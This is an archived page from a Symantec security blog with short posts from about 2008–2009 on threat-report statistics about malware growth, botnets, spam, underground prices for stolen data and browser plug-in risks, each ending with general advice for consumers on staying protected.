View From The Bunker
A blog about security and availability from some of the folk at Symantec

• Home
• About
• RSS
• Get in contact

• Search

  Search for:

• Pages

  • Anyone need help with their VCR? Thought not.
  • Keep Your Data Safe Tool
  • About
  • Get in Contact
  • Books
  • Internet Security Threat Report – Podcast
  • Symantec Fast Response TV Widget
  • Contributers:
    • Darren Thomson
    • Dominic Cook
    • Gareth Fraser-King
    • Guy Bunker
    • John W. Turner

• Recent Posts

  • And the Academy Award for the most dangerous search term goes to…
  • Importance of end-to-end encryption in the retail space
  • Lock Up Your Code
  • Storage Goes Wild…
  • UK ID fraud cases jump a third as malicious insiders turn to cybercrime
  • The Butterfly effect – Mariposa
  • The RSA Conference – Cloud, devices & social changing the game?
  • Financial Data and the Mobile Generation
  • Is online security hindered by computer jargon?
  • 2010s Top 25 Most Dangerous Programming Errors…

• Tags

  backup book bot botnet business continuity Cloud CNI conficker cyber-criminal data-loss Denial of service Downadup Education email encryption fraud Get Safe Online Identity impersonation InfoSec ISTR Las Vegas legislation Malicious insider passwords Phishing policy Privacy Ransomware Reputation RSA Conference security SMB SNIA social networking Spam Speaking StorageExpo underground economy USB Vision vulnerability website whaling wireless

• Blogroll

  • Bruce Schneier’s Blog
  • Get Safe Online (The Blog)
  • Gizmodo Gadget Blog
  • Jonathan Schwartz’s Blog
  • Phil Windley’s Technometria
  • Security Bloggers Network
  • Toby Stevens’ Data Trust Blog

• Multimedia

  • Symantec Guide to Scary Internet Stuff – Botnets
  • Symantec Guide to Scary Internet Stuff – Drive-by downloads
  • Symantec Guide to Scary Internet Stuff – No 5 Rogue AV
  • Symantec Guide to Scary Internet Stuff – No 6 Denial of Service Attacks
  • Symantec Guide to Scary Internet Stuff – No7 Pests on your PC
  • Symantec Guide to Scary Internet Stuff – No8 Losing your Data
  • Symantec Guide to Scary Internet Stuff – Phishing
  • Symantec Guide to Scary Internet Stuff – Underground Economy

• SYMC Blogs

  • Ask Marian Consumer Security Blog
  • Con Mallon’s Symantec Consumer Blog
  • Gareth’s BE Blog
  • Symantec French contributor
  • Symantec podcast channel
• 
• 

Malware – The News Arms Race?

This morning my colleague Tom Parsons from our Dublin Security Response team was quoted in a BBC article talking about the huge rise in malware in recent years and the journalist was speculating the battle between the cybercriminals and the security companies was akin to an arms race.

Certainly the numbers of new pieces of malware on the web these days is simply eye-watering. Symantec’s own Internet Security Threat Report recently reported that during 2008 Symantec created 1,656,227 new malicious code signatures. That’s a massive rise even on malware in 2007 which was in itself a big number!

If it is an arms race, for sure the security companies are pushing ahead with new technology to help them keep ahead of the threats and protect their customers. New approached like White Listing – to approve certain software to run on your PC rather than trying to blacklist the bad stuff – heuristics and behavioural techniques are already making their way into today’s security software and we’ll see a lot more of that in the years to come.

If it is a war, it’s a war which the security world is continually working hard to find new techniques and software to win. But it’s also essential that everyone else does their part too. The sad fact is that a lot of threats are spread by people not taking adequate steps to protect themselves. Just because you have insurance on your house, you can’t just leave your front door open and expect a burglar to walk by. Make sure your software is up-to-date; that you receive the regular updates and patches; and don’t click on links and emails from people you don’t know.

1,900,000 Bots In A Network…

Some research has highlighted an enormous bot network of nearly 2 million machines. Couple that with the finding that one bot can create 600,000 spam messages a day and that gives you the potential for an enormous amount of junk to be zipping around the Internet. This number greater than we saw in the latest Internet Security Threat Report (published earlier this month), where we saw a peak of just over 100,000 machines available on a single day, but with more than 4 million unique systems being compromised in 2008. However, it is possible and if those machines infected with the Conficker / Downadup were ever to be turned into a bot network then that would become even bigger than this!

One of the things the research does highlight is that anti-malware definitions are kept up to date otherwise systems can become infected all too easily. How often should this happen… well as often as the application allows. Switching it to only update once a week will put you at risk. Symantec issued 1.6 million new malware signatures last year… on average that’s more than 30,000 a week… so if you are not up-to-date then you are asking for trouble.

600,000 A Day…

In the latest Internet Security Threat Report published earlier this month, we saw that bots increased 31% in 2008 (and it was 47% increase in EMEA). There is now a new report that shows a top end system can crank out 600,000 spam emails a day when it has been turned into a bot!

How much does it cost to rent a bot… well, we have seen the price on the underground economy drop to a measly $0.04 per bot per day… and there were nearly 5 million unique bots available in 2008, with an average of more than 70,000 available per day! Bots are now responsible for around 90% of spam…

What does a cyber-criminal want… well two things, firstly information that they can use or sell to make money and secondly a fast machine with a good internet connection. They need the latter to rent out to to run spam, phishing and denial of service attacks and scams. So keep your PC under lock and key (from a security perspective) otherwise you could be contributing to the problem spam as well as helping to line the cyber-criminals’ pockets.

60% Of Malware Created In 2008

Symantec’s latest Internet Security Threat Report came out this week and it showed that Symantec issued 1,656,227 new malicious code signatures in 2008. This is more than all the previous years put together!

This represents a tipping point, where it is now easier to look at the good stuff rather than the bad. By following the trend and anticipating the changes, Symantec’s anti-malware products are now a mixture of technologies, blacklisting (the old way – spotting the bad stuff), whitelisting (lists of the good stuff), reputation based (so that new ‘good stuff’ doesn’t get ignored) and behavioural (if there’s something, previously unknown, that is behaving badly it can be stopped.)

One of the other interesting statistics was on the rise of bots. Globally bots are up 31%, with EMEA up 47%. Bots are responsible for around 90% of the spam… so if your computer is infected then you are part of the problem!

Cyber-criminals are still after your confidential information with credit card and bank account details topping the list. Prices on the underground economy have fallen this year indicating that there is more information around and more people trying to sell it. Look after your information – and keep your system up to date – with OS and application patches along with the latest virus definitions. All this can happen automatically… as long as you don’t turn the functionality off.

Credit Card Information… Going Cheap

Symantec’s latest Internet Security Threat Report has updated its figures on the cost of information on the underground economy. Topping the list again this year is credit card information – but the prices is 40% less than last year! How much for your credit card details… a measly $0.06. Or about 4p. Staggering isn’t it. The quantity of information has also gone up, indicating that more people are falling for scams and exposing their credit card numbers and in a typical supply and demand economy there are also more people selling the information. Phishing sites were up 66% on 2007 and the most popular topic… finance.

Email passwords were also on the list and moved up to #3 behind credit card and bank details. Why? Well, there is a lot of information stored in email, including things like credit card details and bank information. Usernames and passwords in general are useful to the cyber-criminal, if its for someone at home, they might have access to one or two pieces of useful information – but if it is a work account, then they might be able to obtain access to complete customer details, or new product details or sensitive financial information.

In tough economic times one of the goals for companies and individuals alike is to save money… and one of the best places to do that is on the Internet. There are a lot of genuine Internet bargains out there but unfortunately there are a lot of scams as well. Just be a little extra vigilant and watch a little closer for them – after all a bargain that appears too good to be true probably is… and you could end up being the victim of fraud.

Beware The Browser…

Symantec’s latest Internet Security Threat Report came out today and one of the trends highlighted is the Internet browser. It’s not just the browser that has vulnerabilities it is also the plug-ins. The average time to fix a problem in the browser is around a week, but some of the maximum times are around six months! However, at least there are fixes and providing you have auto-updates switched on, or have the ‘check for new version’ you should get these pretty quickly after they come out.

However, there were 424 vulnerabilities in browser plug-ins and these are seldomly updated automatically. The most popular vulnerability is memory corruption which enables the cyber-criminal to run any piece of code and basically take over the machine or do whatever they like. Most of the threats are to your confidential information. Social engineering attacks are also in the running, which ultimately result in the user inadvertently installing malware on their machine.

Many of the pieces of malware are now multi-functional, with many allowing remote access, exporting user data and logging keystrokes at the same time. What does this mean, well if you happen to be doing a bit of on-line banking (or shopping) then the cyber-criminal could end up with your bank or credit card details… and they you could become a victim of fraud or worse still identity theft.

New pieces of malware have been created which can be used to become whatever is needed – by downloading content or the payload from cyber-criminal web sites. So, they can be spambots one day and run denial of service the next. Conficker / Downadup is probably the most infamous of this type of malware, although it is unclear as to what the payload is going to be. Having your machine host a spam service unknowingly or perhaps participate in a denial-of-service attack is not good.

So if you are an organization then you need to look at your security and patching policy. Ensure that the latest security definitions are delivered to your users in a timely manner – this will keep you protected while you work on patching the OS and applications. You should also look at a policy for patching or regularly updating browser plug-ins as well.

If you are an individual, then you should also keep your security definitions up to date and also ensure that the OS and application updates are installed. So, if a reminder appears on the screen that an update is available – then install it now, don’t put it off. You may regret it later.

1Server, 3 Weeks, 1.4GB Personal Information

A server was found this week chock full of personal information – 1.4GB of personal information. The information had been stolen from around the world and included health records and email – and within the email there was even more information relating to contacts, account details, pension savings plans (401k) and so on… 1.4GB can house a lot of useful information.

This server was quite a find… but it is not alone, we see compromised servers which receive stolen information everyday and there are a lot of them. OK, so most don’t have 1.4GB but they do contain tens of thousands of pieces of information. The latest Internet Security Threat Report (ISTR Vol. XIII, April 2008) reported more than 60,000 bot infected computers per day (a 17% increase over the previous 6 months). These aren’t all collecting information – most are sending it out (spam, phishing, DoS, …) however some of them are. It also highlighted that of the 54,609 applications installed, 65% were malicious.

So (and I’m starting to sound like a broken record)… if you value your information and something asks to install itself, especially if you are in a web browser (also known as a plug-in), be very sure that the source of the request is valid – if not, then just click away. 

It’s Out Today…

Symantec released its Internet Security Threat Report (ISTR) today. This is volume XIII and as per usual there are some interesting numbers in there – you can download the report from symantec.com. The data is collected from the Global Intelligence Network which operates in 180 countries with more than 40,000 sensors and 2,000,000 managed dummy email accounts.

Some of the new metrics are:

• Malicious attacks on ISPs. These are targeting new subscribers who perhaps don’t have security on their machines that they should.
• Site specific cross-site scripting. Targeting well known sites with invisible changes which downloads trojans on unwary visitors. This is now the most common attack.
• Malicious code which modifies web pages. This is on the increase – and is making it increasingly difficult for the visitor to distinguish a real site from a fake one.

While there is no silver bullet to prevent this from happening – the main watchword is caution. If a site is asking for more information than you are willing to give (do you really need to give your birthday or mother’s maiden name – to any website?) then navigate away unless you are sure that there is a genuine reason for them to have it. Social network sites are springing up and some are not all that they seem to be – just be wary. Also, make sure that you have a personal firewall, anti-virus, anti-phishing toolbar installed and up to date.

I will post some more articles over the next week – highlighting some of the other interesting data points that the report has shown up.

In the meantime hear my views on a podcast: http://www.bitebroadcast.com/symantec/istr08_01/

What Price Information?

In the latest release of the Symantec Internet Security Threat Report we have an update on the price of information. Perhaps one of the most scary aspects is that you can now get volume discounts!

Top of the list are bank account and credit card details which range from 20p to £500. Next are full identities which come in at between 50p and £7.50 – while these do not give instant access to money they do enable cyber criminals to apply for bank accounts and credit cards in the victims name and then perpetrate the fraud without the victim knowing… until they find they have lost their credit rating due to bad debts.

Also making it to the top 5, for the first time, are eBay accounts and go for between 50p – £4. This shows that all information is worth money to someone (further down the list are gaming accounts, social network accounts and others). So… if you have information that you think is valuable to you then it is probably of value to someone else – protect it wisely.

• Subscribe

  

  Enter your email address:

  Delivered by FeedBurner

• 
  

• 
  UK Orders
  US Orders

• 
  UK Orders
  US Orders

• Links, downloads and other resources

  Symantec UK
  Symantec Podcast Directory
  Symantec Security Response